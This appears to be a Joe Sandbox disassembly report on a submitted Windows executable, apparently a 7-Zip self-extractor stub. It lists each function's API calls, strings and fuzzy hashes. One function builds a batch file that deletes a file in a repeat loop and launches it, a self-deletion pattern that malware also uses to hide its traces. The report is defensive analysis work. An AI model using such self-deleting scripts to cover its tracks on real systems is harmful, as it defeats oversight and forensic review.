Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
Opcode Fuzzy Hash: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28

Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
LockResource.KERNEL32(00000000), ref: 00401E2B
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
GetProcAddress.KERNEL32(00000000), ref: 00401E60
wsprintfW.USER32 ref: 00401E7F
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
GetProcAddress.KERNEL32(00000000), ref: 00401E97

Strings

SetProcessPreferredUILanguages, xrefs: 00401E42
SetThreadPreferredUILanguages, xrefs: 00401E8E
%04X%c%04X%c, xrefs: 00401E79
kernel32, xrefs: 00401E47, 00401E4C, 00401E93

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8

Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
GetLastError.KERNEL32 ref: 00408DF4
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
lstrlenW.KERNEL32(?), ref: 00408E44
lstrlenW.KERNEL32(?), ref: 00408E4B
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
Opcode Fuzzy Hash: 70cd8bc1ebd143203d5f1bc79ab162f2f6f4eb1175f08b3b1613c25f11187359
Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4

Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
Opcode Fuzzy Hash: 839cb6fd099afb1d89a388e6f192fb9bcf45602aedd80242c8a3aefe3316d1c0
Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68

Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040864F
SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
GetCurrentThreadId.KERNEL32 ref: 00408669
SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
EndDialog.USER32(?,00000000), ref: 0040869A

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C

Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
FreeSid.ADVAPI32(?), ref: 004024A2

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69

Function 0040AD30 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA

Function 00413D43 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255

Function 00413370 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D

Function 004139D1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0

Function 00413AAB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794

Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D

Strings

" -, xrefs: 0040508A
sfxwaitall, xrefs: 00405085

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 2734624574-3991362806
Opcode ID: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
Opcode Fuzzy Hash: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68

Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
CloseHandle.KERNEL32(00419858), ref: 00405445
SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7

Strings

" goto Repeat, xrefs: 004053E5
", xrefs: 004053BE, 004053C3, 00405407
open, xrefs: 00405468
del ", xrefs: 004053A4, 004053A9, 004053F2
7ZSfx%03x.cmd, xrefs: 0040535D
if exist ", xrefs: 004053CC
:Repeat, xrefs: 00405397

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
Opcode Fuzzy Hash: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68

Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403140
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
GetWindowLongW.USER32(?,000000F0), ref: 00403160

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
GetParent.USER32(?), ref: 0040319B
LoadLibraryA.KERNEL32(riched20), ref: 004031AF
GetMenu.USER32(?), ref: 004031C2
SetThreadLocale.KERNEL32(00000419), ref: 004031CF
CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
DestroyWindow.USER32(?), ref: 00403210
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
GetSysColor.USER32(0000000F), ref: 00403229
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F

Strings

STATIC, xrefs: 0040314A
{\rtf, xrefs: 00403176
riched20, xrefs: 004031AA
RichEdit20W, xrefs: 004031F9

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
Opcode Fuzzy Hash: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68

Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
LoadIconW.USER32(00000000), ref: 00408717
GetSystemMetrics.USER32(00000032), ref: 0040872B
GetSystemMetrics.USER32(00000031), ref: 00408730
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
LoadImageW.USER32(00000000), ref: 0040873C
SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
GetDlgItem.USER32(?,000004B2), ref: 00408781
GetDlgItem.USER32(?,000004B2), ref: 0040878B
GetWindowLongW.USER32(?,000000F0), ref: 00408797
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
GetDlgItem.USER32(?,000004B5), ref: 004087B4
GetDlgItem.USER32(?,000004B5), ref: 004087C2
GetWindowLongW.USER32(?,000000F0), ref: 004087CE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
GetWindow.USER32(?,00000005), ref: 004088C3
GetWindow.USER32(?,00000005), ref: 004088DF
GetWindow.USER32(?,00000005), ref: 004088F7
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
LoadIconW.USER32(00000000), ref: 0040895E
GetDlgItem.USER32(?,000004B1), ref: 0040897D
SendMessageW.USER32(00000000), ref: 00408980

Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 3694754696-0
Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E

Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
